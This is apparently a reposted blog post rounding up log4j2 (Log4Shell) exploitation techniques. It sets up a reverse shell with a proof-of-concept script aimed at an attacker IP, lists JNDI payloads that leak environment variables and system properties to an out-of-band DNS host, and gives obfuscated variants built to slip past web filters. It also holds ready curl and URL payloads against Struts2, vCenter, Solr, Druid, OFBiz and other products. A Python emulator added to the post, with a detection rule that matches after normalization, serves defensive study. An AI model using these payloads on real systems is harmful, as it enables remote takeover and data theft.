[Hands-on] log4j2 remote command execution: a roundup of exploitation techniques

    0x00 Reverse shell

    Target machine: 10.110.13.153 (runs the vulnerable demo application)
    java -jar log4jRCE-0.0.1-SNAPSHOT.jar
    http://10.110.13.153:18080/
    Attacker machine: 10.110.13.106
    python3 poc.py --userip 10.110.13.106 --webport 8000 --lport 2345
    Start the listener on the attacker machine, then trigger the payload against the target to obtain a shell. As their names suggest, the poc.py flags give the attacker's IP, the port of the HTTP server that serves the payload class, and the port the reverse shell connects back to.

    0x01 Extracting sensitive data

    log4j2 java: lookup

    ID  Lookup            JavaLookup method
    1   ${java:version}   getSystemProperty("java.version")
    2   ${java:runtime}   getRuntime()
    3   ${java:vm}        getVirtualMachine()
    4   ${java:os}        getOperatingSystem()
    5   ${java:hw}        getHardware()
    6   ${java:locale}    getLocale()
    A lookup's value is exfiltrated by nesting it inside the JNDI URL, e.g. ${jndi:ldap://${sys:user.name}.ceye.io/a}, so that it becomes part of the hostname the target resolves. When the value contains special characters, DNS out-of-band collection is an option; keep in mind that a DNS label is limited to 63 characters and to letters, digits and hyphens, so long values or values with spaces and slashes arrive truncated or not at all.
    The same pattern applies to the env: and sys: lookups listed below.

    Linux (env: lookup, typical variables)

    ID  Lookup
    1 ${env:CLASSPATH}
    2 ${env:HOME}
    3 ${env:JAVA_HOME}
    4 ${env:LANG}
    5 ${env:LC_TERMINAL}
    6 ${env:LC_TERMINAL_VERSION}
    7 ${env:LESS}
    8 ${env:LOGNAME}
    9 ${env:LSCOLORS}
    10 ${env:LS_COLORS}
    11 ${env:MAIL}
    12 ${env:NLSPATH}
    13 ${env:OLDPWD}
    14 ${env:PAGER}
    15 ${env:PATH}
    16 ${env:PWD}
    17 ${env:SHELL}
    18 ${env:SHLVL}
    19 ${env:SSH_CLIENT}
    20 ${env:SSH_CONNECTION}
    21 ${env:SSH_TTY}
    22 ${env:TERM}
    23 ${env:USER}
    24 ${env:XDG_RUNTIME_DIR}
    25 ${env:XDG_SESSION_ID}
    26 ${env:XFILESEARCHPATH}
    27 ${env:ZSH}

    Windows (env: lookup, typical variables)

    ID  Lookup
    1 ${env:A8_HOME}
    2 ${env:A8_ROOT_BIN}
    3 ${env:ALLUSERSPROFILE}
    4 ${env:APPDATA}
    5 ${env:CATALINA_BASE}
    6 ${env:CATALINA_HOME}
    7 ${env:CATALINA_OPTS}
    8 ${env:CATALINA_TMPDIR}
    9 ${env:CLASSPATH}
    10 ${env:CLIENTNAME}
    11 ${env:COMPUTERNAME}
    12 ${env:ComSpec}
    13 ${env:CommonProgramFiles}
    14 ${env:CommonProgramFiles(x86)}
    15 ${env:CommonProgramW6432}
    16 ${env:FP_NO_HOST_CHECK}
    17 ${env:HOMEDRIVE}
    18 ${env:HOMEPATH}
    19 ${env:JRE_HOME}
    20 ${env:Java_Home}
    21 ${env:LOCALAPPDATA}
    22 ${env:LOGONSERVER}
    23 ${env:NUMBER_OF_PROCESSORS}
    24 ${env:OS}
    25 ${env:PATHEXT}
    26 ${env:PROCESSOR_ARCHITECTURE}
    27 ${env:PROCESSOR_IDENTIFIER}
    28 ${env:PROCESSOR_LEVEL}
    29 ${env:PROCESSOR_REVISION}
    30 ${env:PROMPT}
    31 ${env:PSModulePath}
    32 ${env:PUBLIC}
    33 ${env:Path}
    34 ${env:ProgramData}
    35 ${env:ProgramFiles}
    36 ${env:ProgramFiles(x86)}
    37 ${env:ProgramW6432}
    38 ${env:SESSIONNAME}
    39 ${env:SystemDrive}
    40 ${env:SystemRoot}
    41 ${env:TEMP}
    42 ${env:TMP}
    43 ${env:ThisExitCode}
    44 ${env:USERDOMAIN}
    45 ${env:USERNAME}
    46 ${env:USERPROFILE}
    47 ${env:WORK_PATH}
    48 ${env:windir}
    49 ${env:windows_tracing_flags}
    50 ${env:windows_tracing_logfile}

    log4j2 sys: lookup (JVM system properties)

    ID  Lookup
    1 ${sys:awt.toolkit}
    2 ${sys:file.encoding}
    3 ${sys:file.encoding.pkg}
    4 ${sys:file.separator}
    5 ${sys:java.awt.graphicsenv}
    6 ${sys:java.awt.printerjob}
    7 ${sys:java.class.path}
    8 ${sys:java.class.version}
    9 ${sys:java.endorsed.dirs}
    10 ${sys:java.ext.dirs}
    11 ${sys:java.home}
    12 ${sys:java.io.tmpdir}
    13 ${sys:java.library.path}
    14 ${sys:java.runtime.name}
    15 ${sys:java.runtime.version}
    16 ${sys:java.specification.name}
    17 ${sys:java.specification.vendor}
    18 ${sys:java.specification.version}
    19 ${sys:java.vendor}
    20 ${sys:java.vendor.url}
    21 ${sys:java.vendor.url.bug}
    22 ${sys:java.version}
    23 ${sys:java.vm.info}
    24 ${sys:java.vm.name}
    25 ${sys:java.vm.specification.name}
    26 ${sys:java.vm.specification.vendor}
    27 ${sys:java.vm.specification.version}
    28 ${sys:java.vm.vendor}
    29 ${sys:java.vm.version}
    30 ${sys:line.separator}
    31 ${sys:os.arch}
    32 ${sys:os.name}
    33 ${sys:os.version}
    34 ${sys:path.separator}
    35 ${sys:sun.arch.data.model}
    36 ${sys:sun.boot.class.path}
    37 ${sys:sun.boot.library.path}
    38 ${sys:sun.cpu.endian}
    39 ${sys:sun.cpu.isalist}
    40 ${sys:sun.desktop}
    41 ${sys:sun.io.unicode.encoding}
    42 ${sys:sun.java.command}
    43 ${sys:sun.java.launcher}
    44 ${sys:sun.jnu.encoding}
    45 ${sys:sun.management.compiler}
    46 ${sys:sun.os.patch.level}
    47 ${sys:sun.stderr.encoding}
    48 ${sys:user.country}
    49 ${sys:user.dir}
    50 ${sys:user.home}
    51 ${sys:user.language}
    52 ${sys:user.name}
    53 ${sys:user.script}
    54 ${sys:user.timezone}
    55 ${sys:user.variant}

    0x02 WAF Bypass

    All of the variants below resolve to the same ${jndi:...} lookup: log4j2 substitutes nested ${...} expressions innermost-first, ${::-j} is a lookup with an empty name whose default value (the part after :-) is the literal j, lower:/upper: return their argument case-converted, and the lookup prefix is matched case-insensitively. A WAF that pattern-matches the raw string for "jndi:" therefore never sees it.

    ${jndi:ldap://127.0.0.1:1389/a}
    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://ceye.io/a}
    ${${::-j}ndi:rmi://ceye.io/a}
    ${jndi:rmi://ceye.io}
    ${${lower:jndi}:${lower:rmi}://ceye.io/a}
    ${${lower:${lower:jndi}}:${lower:rmi}://ceye.io/a}
    ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://ceye.io/a}
    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://ceye.io/a}
    ${${upper:jndi}:${upper:rmi}://ceye.io/a}
    ${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://ceye.io/a}
    ${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}://ceye.io/a}
    ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.ceye.io}
    ${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://${hostName}.ceye.io}
    ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.ceye.io}
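The mechanism behind both 0x01 and 0x02 is log4j2's lookup resolution order, and the Python emulation below reproduces it. This is an added example, not code from this post or from log4j2 itself: the FAKE_ENV, FAKE_SYS, FAKE_JAVA and FAKE_PROPS dictionaries are constructed stand-ins for the values a real JVM would return, and analyze() records the JNDI URL a vulnerable (pre-2.15) log4j2 would have contacted instead of performing the lookup. Running the bypass variants above through analyze() shows that they all collapse to the same jndi: lookup, that lookups such as ${env:COMPUTERNAME} are expanded into the LDAP hostname before any request is made (the exfiltration channel of 0x01), and that a raw-string rule like NAIVE_RULE misses every obfuscated variant while resolved_match(), which matches after normalization, catches them.

```python
import re
from dataclasses import dataclass, field

# Constructed stand-ins for what a real JVM would return (sample data only).
FAKE_ENV = {"USER": "tomcat", "COMPUTERNAME": "APP01", "USERDOMAIN": "CORP"}
FAKE_SYS = {"java.version": "1.8.0_181", "os.name": "Linux", "user.name": "tomcat"}
FAKE_JAVA = {"version": "Java version 1.8.0_181", "os": "Linux 5.4.0"}
FAKE_PROPS = {"hostName": "app01"}  # log4j2 exposes hostName through its default map lookup
NAIVE_RULE = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)  # the kind of rule a naive WAF uses


@dataclass
class Resolution:
    text: str = ""
    jndi: list = field(default_factory=list)  # JNDI URLs a vulnerable log4j2 would contact


def _matching_brace(s: str, start: int) -> int:
    """`start` points at the '$' of a '${'; return the index of its matching '}' or -1."""
    depth, i = 0, start
    while i < len(s):
        if s.startswith("${", i):
            depth, i = depth + 1, i + 2
            continue
        if s[i] == "}":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return -1


def _lookup(var: str, res: Resolution):
    """Mimic log4j2's Interpolator: split 'prefix:key', dispatch on the lower-cased prefix."""
    if ":" in var:
        prefix, key = var.split(":", 1)
        prefix = prefix.lower()  # this is why jNdI and JNDI work as well as jndi
        if prefix == "lower":
            return key.lower()
        if prefix == "upper":
            return key.upper()
        if prefix in ("env", "sys", "java"):
            return {"env": FAKE_ENV, "sys": FAKE_SYS, "java": FAKE_JAVA}[prefix].get(key)
        if prefix == "jndi":
            res.jndi.append(key)  # a vulnerable log4j2 performs the JNDI lookup here
            return "<jndi:" + key + ">"
        var = key  # unknown prefix: fall through to the default lookup
    return FAKE_PROPS.get(var)


def substitute(s: str, res: Resolution) -> str:
    """StrSubstitutor order: nested lookups first, then the first ':-' splits name from
    default, then resolve; the resolved value is substituted again."""
    out, i = [], 0
    while i < len(s):
        if not s.startswith("${", i):
            out.append(s[i])
            i += 1
            continue
        end = _matching_brace(s, i)
        if end == -1:  # unterminated ${ is emitted verbatim
            out.append(s[i:])
            break
        expr = substitute(s[i + 2:end], res)  # 1. inner ${...} resolved first
        name, default = expr, None
        k = expr.find(":-")  # 2. ':-' separates name from default value
        if k != -1:
            name, default = expr[:k], expr[k + 2:]
        value = _lookup(name, res)  # 3. resolve, falling back to the default
        if value is None:
            value = default
        out.append(s[i:end + 1] if value is None else substitute(value, res))
        i = end + 1
    return "".join(out)


def analyze(message: str) -> Resolution:
    """Resolve a logged string the way a pre-2.15 log4j2 would, recording JNDI targets."""
    res = Resolution()
    res.text = substitute(message, res)
    return res


def naive_match(message: str) -> bool:
    """Raw-string WAF rule: misses every obfuscated variant."""
    return NAIVE_RULE.search(message) is not None


def resolved_match(message: str) -> bool:
    """Normalize-then-match: flag a message if any jndi: lookup would fire."""
    return bool(analyze(message).jndi)
```

Call analyze(payload).jndi on any line from the list above; a non-empty list means the payload would have triggered a lookup, and the recorded URL shows exactly which expanded hostname the target would have resolved. For detection, resolving (or at least recursively collapsing) ${...} expressions before matching is the robust approach. One caveat the emulation also surfaces: ${upper::-j} resolves to an empty string here, because the name/default split leaves the upper lookup with an empty key, which it upper-cases to "" rather than returning null, so the default j is never used; verify that variant against the actual target version before relying on it.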

    0x03 Payloads for other known affected components

    Apache Struts2
    curl http://127.0.0.1:8080/struts2-showcase/token/transfer4.action -d struts.token.name='${jndi:rmi://127.0.0.1:1099/ylbtsl}'
    http://localhost:8080/struts2-showcase/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/
    (the second form is URL-encoded; ${::-/} yields a slash only at resolution time, so the request path itself never contains "//")
     
    VMware vCenter
    curl -H "X-Forwarded-For: \${jndi:ldap://10.0.0.3:1270/lol}" "https://10.0.0.4/websso/SAML2/SSO/photon-machine.lan?SAMLRequest="
     
    Apache James
    curl "smtp://localhost" --user "test:test" --mail-from '${jndi:ldap://localhost:1270/a}@gmail.com' --mail-rcpt 'test' --upload-file email.txt
     
    Apache Solr

    /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json
    /solr/admin/cores?action=CREATE&name=$%7Bjndi:ldap://0.0.0.0/123%7D&wt=json
    /solr/admin/info/system?_=${jndi:ldap://0.0.0.0/123}&wt=json
    /solr/admin/cores?_=&action=&config=&dataDir=&instanceDir=${jndi:ldap://0.0.0.0/123}&name=&schema=&wt=

    Apache Flink
    POST http://0.0.0.0:8081/jars/${jndi:ldap:%252f%252f0.0.0.0%252f123}.jar/run
    (%252f is a double URL-encoded slash, so the jar name in the request path contains no literal "/")
     
    Apache Druid

    /druid/coordinator/${jndi:ldap://0.0.0.0/123}
    /druid/indexer/${jndi:ldap://0.0.0.0/123}
    /druid/v2/${jndi:ldap://0.0.0.0/123}
    curl -vv -X DELETE 'http://xxxxxx:8888/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2fdruid_test.yyyyyyyy%7d'

     
    Apache JSPWiki
    http://localhost:8080/JSPWiki/wiki/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/
     
    Apache OFBiz
    curl -H "Cookie: OFBiz.Visitor=\${jndi:ldap://localhost:1270/abc}" https://localhost:8443/webtools/control/main
     
     
    Original article: https://www.cnblogs.com/peterpan0707007/p/15772359.html
Copyright © 2020-2023  润新知